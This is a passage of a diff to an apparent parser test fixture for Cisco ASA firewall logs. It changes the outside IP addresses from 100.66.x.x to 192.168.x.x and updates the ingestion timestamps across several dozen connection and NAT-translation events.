"mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11780", "source_interface": "outside", "mapped_destination_port": 1454 @@ -4426,8 +4426,8 @@ }, "destination": { "port": 8268, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1455, 
@@ -4467,7 +4467,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4475,8 +4475,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111650692Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268", + "ingested": "2021-12-09T13:31:36.363502300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4509,8 +4509,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4545,7 +4545,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4554,8 +4554,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111652434Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", + "ingested": "2021-12-09T13:31:36.363524200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4571,7 +4571,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11781", "source_interface": "outside", "mapped_destination_port": 1455 
@@ -4588,8 +4588,8 @@ }, "destination": { "port": 8269, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1456, @@ -4629,7 +4629,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4637,8 +4637,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111654088Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269", + "ingested": "2021-12-09T13:31:36.363529500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4671,8 +4671,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4707,7 +4707,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4716,8 +4716,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111655742Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", + "ingested": "2021-12-09T13:31:36.363534100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -4733,7 +4733,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11782", "source_interface": "outside", "mapped_destination_port": 1456 @@ -4755,8 +4755,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -4791,7 +4791,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -4800,8 +4800,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111657481Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363539300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -4817,7 +4817,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.4", + "mapped_source_ip": "192.168.100.4", "connection_id": "11783", "source_interface": "outside", "mapped_destination_port": 56132 @@ -4839,8 +4839,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -4875,7 +4875,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, 
@@ -4885,8 +4885,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111659156Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:31:36.363544500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4918,8 +4918,8 @@ }, "destination": { "port": 8270, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1457, @@ -4959,7 +4959,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4967,8 +4967,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111660818Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270", + "ingested": "2021-12-09T13:31:36.363548400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5001,8 +5001,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5037,7 +5037,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, 
@@ -5046,8 +5046,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111662474Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", + "ingested": "2021-12-09T13:31:36.363553Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5063,7 +5063,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11784", "source_interface": "outside", "mapped_destination_port": 1457 @@ -5080,8 +5080,8 @@ }, "destination": { "port": 8271, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1458, @@ -5121,7 +5121,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5129,8 +5129,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111664116Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271", + "ingested": "2021-12-09T13:31:36.363558700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5163,8 +5163,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" 
@@ -5199,7 +5199,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5208,8 +5208,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111665819Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", + "ingested": "2021-12-09T13:31:36.363562600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5225,7 +5225,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11785", "source_interface": "outside", "mapped_destination_port": 1458 @@ -5247,8 +5247,8 @@ }, "source": { "port": 53, - "address": "100.66.1.107", - "ip": "100.66.1.107" + "address": "192.168.1.107", + "ip": "192.168.1.107" }, "tags": [ "preserve_original_event" @@ -5283,7 +5283,7 @@ "localhost" ], "ip": [ - "100.66.1.107", + "192.168.1.107", "172.31.98.44" ] }, @@ -5292,8 +5292,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111667537Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363567600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", 
@@ -5309,7 +5309,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.1.107", + "mapped_source_ip": "192.168.1.107", "connection_id": "11786", "source_interface": "outside", "mapped_destination_port": 56132 @@ -5331,8 +5331,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5367,7 +5367,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5378,8 +5378,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111669206Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", + "ingested": "2021-12-09T13:31:36.363571800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -5411,8 +5411,8 @@ }, "destination": { "port": 8272, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1459, @@ -5452,7 +5452,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -5460,8 +5460,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111670851Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272", + "ingested": "2021-12-09T13:31:36.363576300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5494,8 +5494,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5530,7 +5530,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5539,8 +5539,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111672537Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", + "ingested": "2021-12-09T13:31:36.363580400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5556,7 +5556,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11787", "source_interface": "outside", "mapped_destination_port": 1459 @@ -5578,8 +5578,8 @@ }, "source": { "port": 53, - "address": "100.66.1.107", - "ip": "100.66.1.107" + "address": "192.168.1.107", + "ip": "192.168.1.107" }, "tags": [ "preserve_original_event" 
@@ -5614,7 +5614,7 @@ "localhost" ], "ip": [ - "100.66.1.107", + "192.168.1.107", "172.31.98.44" ] }, @@ -5624,8 +5624,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111674159Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", + "ingested": "2021-12-09T13:31:36.363585300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -5657,8 +5657,8 @@ }, "destination": { "port": 8273, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1460, @@ -5698,7 +5698,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5706,8 +5706,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111675872Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273", + "ingested": "2021-12-09T13:31:36.363590500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5740,8 +5740,8 @@ }, "source": { "port": 80, - "address": "100.66.192.44", - "ip": "100.66.192.44" + "address": "192.168.192.44", + "ip": "192.168.192.44" }, "tags": [ "preserve_original_event" @@ -5776,7 +5776,7 @@ "localhost" ], "ip": [ - "100.66.192.44", + "192.168.192.44", "172.31.98.44" ] }, 
@@ -5785,8 +5785,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111677512Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", + "ingested": "2021-12-09T13:31:36.363596800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5802,7 +5802,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.192.44", + "mapped_source_ip": "192.168.192.44", "connection_id": "11788", "source_interface": "outside", "mapped_destination_port": 1460 @@ -5840,8 +5840,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111679154Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.363601500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -5866,8 +5866,8 @@ }, "destination": { "port": 8277, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1385, @@ -5907,7 +5907,7 @@ ], "ip": [ "172.31.156.80", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -5915,8 +5915,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111680802Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277", + "ingested": "2021-12-09T13:31:36.363606100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5949,8 +5949,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -5985,7 +5985,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.156.80" ] }, @@ -5994,8 +5994,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111682475Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", + "ingested": "2021-12-09T13:31:36.363610400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -6011,7 +6011,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.156.80", - "mapped_source_ip": "100.66.19.254", + "mapped_source_ip": "192.168.19.254", "connection_id": "11797", "source_interface": "outside", "mapped_destination_port": 1385 
@@ -6049,8 +6049,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111684125Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.363614200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6096,8 +6096,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111686039Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.363619200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6143,8 +6143,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111687686Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.363623600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -6190,8 +6190,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111689325Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.363628100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6237,8 +6237,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111692195Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.363633300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6284,8 +6284,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111693913Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.363639600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6315,8 +6315,8 @@ }, "source": { "port": 80, - "address": "100.66.115.46", - "ip": "100.66.115.46" + "address": "192.168.115.46", + "ip": "192.168.115.46" }, "tags": [ "preserve_original_event" 
@@ -6351,7 +6351,7 @@ "localhost" ], "ip": [ - "100.66.115.46", + "192.168.115.46", "172.31.156.80" ] }, @@ -6362,8 +6362,8 @@ "severity": 6, "duration": 325000000000, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111695713Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", + "ingested": "2021-12-09T13:31:36.363645Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:29:31.000Z", @@ -6400,8 +6400,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6436,7 +6436,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.156.80" ] }, @@ -6447,8 +6447,8 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111697358Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363650200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -6480,8 +6480,8 @@ }, "destination": { "port": 8278, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1386, 
@@ -6521,7 +6521,7 @@ ], "ip": [ "172.31.156.80", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -6529,8 +6529,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111699045Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278", + "ingested": "2021-12-09T13:31:36.363653900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -6563,8 +6563,8 @@ }, "source": { "port": 80, - "address": "100.66.115.46", - "ip": "100.66.115.46" + "address": "192.168.115.46", + "ip": "192.168.115.46" }, "tags": [ "preserve_original_event" @@ -6599,7 +6599,7 @@ "localhost" ], "ip": [ - "100.66.115.46", + "192.168.115.46", "172.31.156.80" ] }, @@ -6608,8 +6608,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111700712Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", + "ingested": "2021-12-09T13:31:36.363658600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -6625,7 +6625,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.156.80", - "mapped_source_ip": "100.66.115.46", + "mapped_source_ip": "192.168.115.46", "connection_id": "11798", "source_interface": "outside", "mapped_destination_port": 1386 
@@ -6647,8 +6647,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6682,7 +6682,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6691,8 +6691,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.111702310Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.363664Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6728,8 +6728,8 @@ }, "source": { "port": 80, - "address": 